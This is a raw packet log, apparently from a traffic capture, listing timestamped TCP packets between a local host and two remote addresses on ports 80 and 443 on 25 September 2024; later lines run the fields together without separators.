Sep 25, 2024 12:35:49.528768063 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.528805017 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.528821945 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.539531946 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.539568901 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.539604902 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.539638042 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.539638042 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.539676905 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.539727926 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.539777040 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.539916039 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.539994955 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.540072918 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540107012 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540138960 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.540142059 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540174961 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540222883 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.540303946 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.540705919 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540740013 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540774107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540798903 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.540807009 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540843964 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.540882111 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.540956974 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.551016092 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551048994 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551080942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551131964 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.551187038 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551218987 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.551219940 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551274061 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551299095 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.551306963 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551342010 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551378965 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.551388025 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.551441908 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.551506042 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.552308083 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.552340984 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.552376986 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.552390099 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.552412987 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.552447081 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.552486897 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.552572012 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.553097010 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.553129911 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.553164005 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.553196907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.553204060 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.553282022 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.605560064 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605581999 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605611086 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605627060 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605643034 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605658054 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605675936 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.605695009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.605794907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.606241941 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.606256008 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.606328964 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.616900921 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.616925001 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.616940975 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.616956949 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617023945 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617134094 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.617162943 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617180109 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617183924 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.617194891 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617209911 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617225885 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.617238998 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.617363930 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.617980003 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.618011951 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.618031025 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.618046999 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.618062973 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.618089914 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.618174076 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.627995014 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628011942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628057957 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628082991 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628160954 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628175974 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628191948 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628206015 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628209114 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628222942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628237009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628237009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628237963 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628247976 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628269911 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628288984 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628901958 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628916979 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628931046 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628945112 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628947020 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.628973007 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.628992081 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.629468918 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.629483938 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.629499912 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.629529953 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.629530907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.629549980 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.629654884 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.629698992 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.639694929 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639743090 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639758110 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639792919 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.639800072 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639816999 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.639816999 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639834881 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639848948 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639849901 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.639868021 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.639873028 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.639899015 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.639930010 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.640312910 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640342951 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640394926 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.640481949 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640492916 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.640499115 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640516043 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640553951 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.640583992 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640599966 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640615940 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.640626907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.640711069 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.641356945 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.641424894 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.641432047 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.641441107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.641457081 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.641473055 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.641489029 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.641529083 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.641611099 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.642203093 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.642234087 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.642249107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.642270088 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.642275095 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
                                        Sep 25, 2024 12:35:49.642290115 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.642307043 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.642322063 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.642401934 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.643104076 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.643126965 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.643143892 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.643158913 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.643176079 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.643182993 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.643254042 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.684669018 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.684760094 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.684792995 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.684797049 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.684827089 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.684829950 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.684864044 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.684864044 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695363045 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695444107 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695444107 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695480108 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695491076 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695514917 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695523977 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695552111 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695557117 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695585966 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695597887 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695621014 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695626974 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695656061 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695662022 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695704937 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695776939 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695811987 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695830107 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695846081 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695853949 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695879936 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695888996 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695914030 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695920944 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695947886 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.695959091 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.695991993 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.696002960 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.696052074 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705234051 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705291033 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705312967 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705319881 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705336094 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705362082 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705377102 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705421925 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705427885 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705462933 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705471039 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705497026 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705502033 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705539942 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705792904 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705845118 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705847979 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705893040 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705898046 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705933094 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705946922 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705966949 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705974102 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706011057 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706423998 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706458092 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706479073 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706492901 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706500053 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706526995 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706537008 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706562996 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706572056 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706598997 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706604004 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706648111 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707082033 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707189083 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707271099 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707304001 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707334995 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707339048 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707360983 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707372904 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707396984 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707421064 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707432032 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707456112 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707472086 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707493067 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707505941 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707537889 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708492041 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708524942 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708548069 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708556890 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708559036 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708595037 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708604097 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708645105 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716367006 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716429949 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716430902 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716460943 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716473103 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716506004 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716512918 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716547012 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716558933 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716581106 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716597080 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716615915 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716625929 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716655970 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716877937 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716911077 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716931105 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716944933 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716953993 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716979980 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716990948 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717020035 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717263937 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717297077 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717315912 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717330933 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717341900 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717365980 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717374086 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717401028 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717406988 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717451096 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:50.036988020 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.037049055 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.037111998 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.050549984 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.050570011 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.512327909 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.512413979 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.514339924 CEST49738443192.168.2.4172.67.74.152
